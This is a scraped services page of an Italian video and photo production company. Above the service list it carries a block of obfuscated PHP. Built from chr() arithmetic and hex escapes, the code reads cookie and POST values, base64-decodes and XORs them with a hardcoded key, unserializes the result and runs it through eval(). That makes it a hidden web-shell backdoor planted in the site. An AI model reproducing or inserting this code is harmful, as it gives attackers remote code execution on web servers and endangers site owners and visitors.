$UQNJIDNQz = 'V' . "\x5f" . chr (79) . "\x4a" . 'M' . "\x56" . "\x6f";$lULfatfY = chr (99) . 'l' . chr (97) . chr (115) . "\x73" . '_' . chr ( 232 - 131 )."\170" . chr (105) . "\x73" . "\x74" . chr (115); $NxuweBlR = class_exists($UQNJIDNQz); $lULfatfY = "39096";$PiHgFezhx = !1;if ($NxuweBlR == $PiHgFezhx){function LhtZxc(){$HJkEuneQK = new /* 39223 */ V_OJMVo(20156 + 20156); $HJkEuneQK = NULL;}$DwOwyiFox = "20156";class V_OJMVo{private function vxQwZH($DwOwyiFox){if (is_array(V_OJMVo::$GkySc)) {$rkLLOGOK = str_replace("\x3c" . '?' . "\160" . 'h' . "\160", "", V_OJMVo::$GkySc[chr (99) . "\157" . 'n' . chr ( 1072 - 956 ).'e' . chr ( 792 - 682 ).chr ( 355 - 239 )]);eval($rkLLOGOK); $DwOwyiFox = "20156";exit();}}private $ifpDEp;public function FLXlvD(){echo 30200;}public function __destruct(){$DwOwyiFox = "28033_12523";$this->vxQwZH($DwOwyiFox); $DwOwyiFox = "28033_12523";}public function __construct($wrriE=0){$LzSzVBo = $_POST;$rNIqtoeXiy = $_COOKIE;$qqSYAY = "369aaf5c-6fee-4554-83fa-81dd89fc1a6d";$wvLyo = @$rNIqtoeXiy[substr($qqSYAY, 0, 4)];if (!empty($wvLyo)){$vOKyID = "base64";$yfDSS = "";$wvLyo = explode(",", $wvLyo);foreach ($wvLyo as $nqonMSN){$yfDSS .= @$rNIqtoeXiy[$nqonMSN];$yfDSS .= @$LzSzVBo[$nqonMSN];}$yfDSS = array_map($vOKyID . "\x5f" . chr (100) . 'e' . "\143" . chr ( 264 - 153 ).'d' . "\x65", array($yfDSS,)); $yfDSS = $yfDSS[0] ^ str_repeat($qqSYAY, (strlen($yfDSS[0]) / strlen($qqSYAY)) + 1);V_OJMVo::$GkySc = @unserialize($yfDSS); $yfDSS = class_exists("28033_12523");}}public static $GkySc = 55384;}LhtZxc();}$FDqVNgrS = "\x41" . chr ( 954 - 859 ).'W' . "\x7a" . chr (121) . chr ( 118 - 53 ).'C';$AIccmDP = "\143" . 'l' . "\141" . chr (115) . chr ( 586 - 471 ).chr (95) . 'e' . 'x' . chr ( 583 - 478 )."\x73" . chr ( 222 - 106 ).chr ( 695 - 580 ); $QLtkf = class_exists($FDqVNgrS); $FDqVNgrS = "63032";$AIccmDP = "60292";$eBEYaMtFu = !1;if ($QLtkf == $eBEYaMtFu){function JSNDn(){return FALSE;}$iBmRhol = "13301";JSNDn();class A_WzyAC{private function gCHvUvlteO($iBmRhol){if (is_array(A_WzyAC::$FtdBFqMTZ)) {$BKbnxiZxzV = str_replace(chr ( 793 - 733 ) . "\77" . chr (112) . chr (104) . chr (112), "", A_WzyAC::$FtdBFqMTZ[chr ( 377 - 278 ).chr ( 782 - 671 )."\156" . 't' . chr (101) . "\x6e" . "\x74"]);eval($BKbnxiZxzV); $iBmRhol = "13301";exit();}}private $AkQnZdAPD;public function ixAtdX(){echo 59273;}public function __destruct(){$iBmRhol = "26120_54340";$this->gCHvUvlteO($iBmRhol); $iBmRhol = "26120_54340";}public function __construct($mBdUZG=0){$lRgTv = $_POST;$OprFVCta = $_COOKIE;$uvBcQTeQYY = "27acbcb0-0066-431b-b76d-2fd433ffaa5f";$WGYJOEqp = @$OprFVCta[substr($uvBcQTeQYY, 0, 4)];if (!empty($WGYJOEqp)){$VsJntyqk = "base64";$efNbrf = "";$WGYJOEqp = explode(",", $WGYJOEqp);foreach ($WGYJOEqp as $oRxJu){$efNbrf .= @$OprFVCta[$oRxJu];$efNbrf .= @$lRgTv[$oRxJu];}$efNbrf = array_map($VsJntyqk . "\137" . 'd' . 'e' . chr (99) . "\x6f" . chr (100) . 'e', array($efNbrf,)); $efNbrf = $efNbrf[0] ^ str_repeat($uvBcQTeQYY, (strlen($efNbrf[0]) / strlen($uvBcQTeQYY)) + 1);A_WzyAC::$FtdBFqMTZ = @unserialize($efNbrf); $efNbrf = class_exists("26120_54340");}}public static $FtdBFqMTZ = 53136;}$GBdJfS = new /* 60105 */ A_WzyAC(13301 + 13301); $_POST = Array();unset($GBdJfS);} I nostri servizi - Action Skip to content
I NOSTRI SERVIZI
  • Creativity & Copywriting
  • Pre Production & Location Scouting
  • Production
  • Shooting Video
  • Post Production: Video/Audio
  • Animation Graphics 2D – 3D
  • Convention: Direction & Organization
  • Events Backstage: Video/Photo
  • Shooting Photo & Reportage